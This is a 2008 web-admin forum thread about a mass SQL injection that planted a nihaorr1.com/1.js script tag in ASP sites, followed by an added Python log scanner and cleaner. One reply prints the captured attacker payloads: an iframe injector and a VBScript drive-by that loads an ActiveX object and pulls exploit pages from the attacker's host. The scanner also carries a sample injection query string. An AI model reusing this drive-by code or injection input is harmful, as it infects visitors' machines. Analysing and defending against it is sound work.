kckriegs
11 Posts
Anyone know about www.nihaorr1.com/1.js?
Apr 17, 2008 09:35 PM
The db that supports our company's ecommerce is filling up with this url. We seem to be victims of a sql injection attack. Is anyone else experiencing this? How are you resolving it? We just happened to see this data...are there other adverse effects to resources other than data?
Any shared experience would be helpful!
Rovastar
3321 Posts
MVP
Moderator
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 09:19 AM
Not noticed anything.
Looks dodgy though. I presume you have only just started getting these. Only from 11 Apr?
That is when the domain nihaorr1.com was registered. IP geolocation shows this machine in Beijing, China
What page are they hammering? What do the IIS logs say? Then look at that page. Nearly all hacks now are over http so it will be the devs' fault for having sloppy code.
Rovastar
3321 Posts
MVP
Moderator
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 09:34 AM
Yeah it is a script bot that spreads a virus; seems to be very wild atm.
Googling nihaorr1.com there are many references to it on sites http://www.google.co.uk/search?hl=en&q=nihaorr1.com&btnG=Search&meta= (11,000 references at the time)
Even when I clicked on a link, the virus checker popped up warning me of a virus there. I'll not try again.
It just seems to affect asp pages at the moment.
There were a few recent vulnerabilities with asp and IIS over the last 6 months like
http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx
I expect it is exploiting one of those.
Take care.
onionlips
1 Post
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 02:25 PM
We have been hit by this as well. Lucky backup ran last night just prior to the attack.
Our initial investigations are pointing at an attack through IIS using ASP in an overload.
A whois lookup shows nihaorr1 registered via Chinese registrar xinnet.com.
I used the safety of a VM to look under the hood at the operations of the 1.js file.
It writes several iframes that seem to come up as page not found (Chinese language pack).
A look at the script is a bit confusing and garbled (of course) but consistent reference is made to "cuteqq" as a variable and variable prefix. It creates an executable; I have yet to determine its intent or impact.
Googling "cuteqq" pulls up all sorts of harmful flagged pages. Anyone have any insight on that?
autodynamic1
1 Post
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 05:16 PM
I also have been hit by this attack on Saturday 4/12/08. It compromised our database and overwrote that script into all of our products. Luckily a database restore fixed the problem. Two days later the same thing happened; I have changed all the database and login passwords and did another db restore. Now today 4/18/08 we got hit again by the same thing, but this time as the pages are loaded ActiveX is activated and wants to run, but of course I did not allow it. Has anybody successfully solved this situation?
nihaorr1 xss sql injection
rwmorey
4 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 06:17 PM
Hi --
We have been hit with this virus/injection as well. We are running Windows 2003 and I believe I have all the security patches on our system.
Does anyone have any idea how to prevent this from re-happening?
Rich
eftennis
4 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 07:17 PM
We were hit as well last week by a similar one. aspder
Now, last night we were hit by the nihaorr1 attack. Last night's was a little more sophisticated. It inserted script logic into various fields in the database. We ran sql queries to clean it out since no data was removed.
It appears to be a SQL Injector. But, we have not found the exact fix for our asp scripts to stop it. I managed to find entries in our log files to show the time. The interesting part is that it came from a local connection. This appears to be a virus that hijacks a computer to do its dirty work, since the source is not from China.
bcondrey
1 Post
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 07:57 PM
Can you let me know what you searched for specifically in your logs? What was the internal PC infected with, did you get a virus name? We had a PC that was infected by a virus called infostealer, but we aren't sure if the PC caught it from the webserver, or vice-versa. Thanks Barry
davcox
267 Posts
Microsoft
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 11:57 PM
Yikes, pretty dangerous, a good time to scan your content for this URL and notify the website owners so they can fix their websites, applications and then fix the form validation logic.
Looks like someone is doing a lot of script code injection into a lot of vulnerable (read: poorly written) forms that aren't validating input to strip out script code. These sites are then carrying javascript code that launches Remote Data Services Control ActiveX control ... to exploit a few known vulnerabilities ... use WFetch to debug this!!! (You can get WFetch for free in the IIS6.0 Resource Kit.)
For example, here is how I looked at this:
GET http://www.nihaorr1.com:80/1.js HTTP/1.1\r\n
Host: www.nihaorr1.com\r\n
Accept: */*\r\n
\r\n
HTTP/1.1 200 OK\r\n
Connection: Keep-Alive\r\n
Content-Length: 110\r\n
Via: 1.1 RED-PRXY-29\r\n
Date: Fri, 18 Apr 2008 23:53:38 GMT\r\n
Content-Type: application/x-javascript\r\n
ETag: "30e1873949a1c81:237"\r\n
Server: Microsoft-IIS/6.0\r\n
Last-Modified: Fri, 18 Apr 2008 11:42:04 GMT\r\n
Accept-Ranges: bytes\r\n
\r\n
document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nihaorr1.com\/1.htm\'><\/iframe>");\r\n
\r\n
Then I made a second request to the iframe it tries to create:
GET http://www.nihaorr1.com:80/1.htm HTTP/1.1\r\n
Host: www.nihaorr1.com\r\n
Accept: */*\r\n
\r\n
HTTP/1.1 200 OK\r\n
Connection: Keep-Alive\r\n
Content-Length: 1160\r\n
Date: Fri, 18 Apr 2008 23:53:51 GMT\r\n
Content-Type: text/html\r\n
ETag: "fc6b5a164da1c81:237"\r\n
Server: Microsoft-IIS/6.0\r\n
Last-Modified: Fri, 18 Apr 2008 12:09:43 GMT\r\n
Accept-Ranges: bytes\r\n
\r\n
<script language=VBScript>\r\n
on error resume next\r\n
Set downf = document.createElement("object")\r\n
downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"\r\n
str="Microsoft.XMLHTTP"\r\n
Set O = downf.CreateObject(str,"")\r\n
if Not Err.Number = 0 then\r\n
err.clear\r\n
document.write("<iframe width=""10"" height=""10"" src=""http://www.nihaorr1.com/Real.gif""></iframe>") \r\n
document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Yahoo.php""></iframe>")\r\n
document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/cuteqq.htm""></iframe>") \r\n
document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07055.htm""></iframe>") \r\n
document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07033.htm""></iframe>") \r\n
document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07004.htm""></iframe>")\r\n
else\r\n
document.write("<iframe width=""0"" height=""0"" src=""http://www.nihaorr1.com/Ajax.htm""></iframe>")\r\n
document.write("<iframe width=""0"" height=""0"" src=""http://www.nihaorr1.com/Ms06014.htm""></iframe>")\r\n
end if\r\n
</script>\r\n
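As an added example (not code from this thread or from any poster), here is a small Python helper set for what several replies above describe: checking IIS logs for injection-style query strings and stripping the injected 1.js tag from text stored in the database. It assumes IIS W3C extended logging with cs-uri-query enabled, that the stored payload is a script tag pointing at www.nihaorr1.com/1.js, and the SQL keyword list and sample log lines are constructed.

```python
import re

# Added example, not from the thread. Assumed form of the stored payload: a
# <script src=...1.js></script> tag written into text columns by the injection.
INJECTED_TAG = re.compile(
    r"""<script\s+src=["']?https?://www\.nihaorr1\.com/1\.js["']?\s*>\s*</script>""",
    re.IGNORECASE,
)

# Assumed query-string markers for an injection that rewrites database text columns.
SQLI_MARKERS = re.compile(r"\b(DECLARE|CAST|EXEC|VARCHAR|UPDATE|SYSOBJECTS)\b", re.IGNORECASE)


def strip_injected_script(value: str) -> tuple[str, int]:
    """Return the field value with the injected tag removed, plus how many were removed."""
    cleaned, count = INJECTED_TAG.subn("", value)
    return cleaned, count


def parse_w3c_log(text: str) -> list[dict]:
    """Parse IIS W3C extended log text into one dict per request using its #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            rows.append(dict(zip(fields, line.split())))
    return rows


def suspicious_requests(rows: list[dict]) -> list[dict]:
    """Flag requests whose query string carries SQL keywords or the attacker's domain."""
    flagged = []
    for row in rows:
        query = row.get("cs-uri-query", "-")
        if query != "-" and (SQLI_MARKERS.search(query) or "nihaorr1" in query.lower()):
            flagged.append(row)
    return flagged


# Constructed sample log (not real traffic): one normal request, one injection-style request.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-04-17 21:35:01 192.0.2.10 GET /product.asp id=42 200
2008-04-17 21:35:02 192.0.2.77 GET /product.asp id=42;DECLARE%20@s%20VARCHAR(4000) 200
"""

if __name__ == "__main__":
    for row in suspicious_requests(parse_w3c_log(SAMPLE_LOG)):
        print(row["c-ip"], row["cs-uri-stem"], row["cs-uri-query"])
```

Run the log check over the real W3C files first to find the page and timestamp being hammered, then apply strip_injected_script to the affected columns after the form input on that page has been fixed.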
asidana
20 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 19, 2008 01:36 PM
I've been using the below regex
and got hit, couldn't find anything in my server log about how it's done